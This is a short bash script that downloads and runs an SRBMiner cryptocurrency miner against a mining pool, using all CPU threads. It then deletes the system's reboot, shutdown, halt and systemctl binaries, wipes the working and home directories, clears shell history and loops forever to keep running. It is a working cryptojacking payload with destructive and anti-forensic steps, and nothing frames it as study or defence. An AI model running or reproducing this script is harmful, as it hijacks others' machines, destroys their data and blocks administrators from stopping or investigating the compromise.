#!/bin/bash
wget -O mmm https://github.com/claires67/buut/raw/main/SRBMiner-MULTI > /dev/null 2>&1
chmod 777 mmm
./mmm --algorithm panthera --pool randomx.rplant.xyz:7144 --wallet fySunSKDjvQ9MDAaAMwW53iBrsMhukvahJQsk1oXShpq33pMS32NYziVoU5bNdhpSkLUh7uVdmkjZhmvikq4tA9h1swuRn4jQ.$(echo $(shuf -i 1-100000 -n 1)-BR) --password $(echo $(shuf -i 1-100000 -n 1)-BR) --cpu-threads $(nproc --all) --keepalive true
sleep 30
sudo rm -rvf /sbin/reboot /sbin/shutdown /sbin/poweroff /sbin/halt /bin/systemctl /usr/sbin/reboot /usr/sbin/shutdown /usr/sbin/poweroff /usr/sbin/halt /usr/bin/systemctl || rm -rvf /sbin/reboot /sbin/shutdown /sbin/poweroff /sbin/halt /bin/systemctl /usr/sbin/reboot /usr/sbin/shutdown /usr/sbin/poweroff /usr/sbin/halt /usr/bin/systemctl
curl ifconfig.me
rm -rvf *
cd ~/
rm -rvf *
history -cr
while true
do
        echo "hold down..."
        sleep 30
done
